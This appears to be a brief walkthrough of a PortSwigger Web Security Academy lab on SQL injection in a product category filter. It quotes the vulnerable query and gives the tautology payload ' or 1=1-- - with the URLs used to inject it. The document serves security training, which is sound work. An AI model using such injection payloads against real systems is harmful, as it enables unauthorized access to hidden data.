where you can modify an SQL query to return additional results.

https://portswigger.net/web-security/sql-injection/lab-retrieve-hidden-data

This lab contains an SQL injection vulnerability in the product category filter. When the user selects a category, the application carries out an SQL query like the following:

SELECT * FROM products WHERE category = 'Gifts' AND released = 1

To solve the lab, perform an SQL injection attack that causes the application to display details of all products in any category, both released and unreleased.

Access the lab

Solution: ' or 1=1-- -

Steps:

  1. Visit: https://YOUR-SESSION.web-security-academy.net/filter?category=Accessories
  2. insert ': https://YOUR-SESSION.web-security-academy.net/filter?category=Accessories'
  3. you will gain an internal server error
  4. try to inject tautology payload to retrieve released and unreleased products
  5. https://ac631f881eeeb165c0bf17e90011009b.web-security-academy.net/filter?category=Accessories' or 1=1-- -

Untitled

Untitled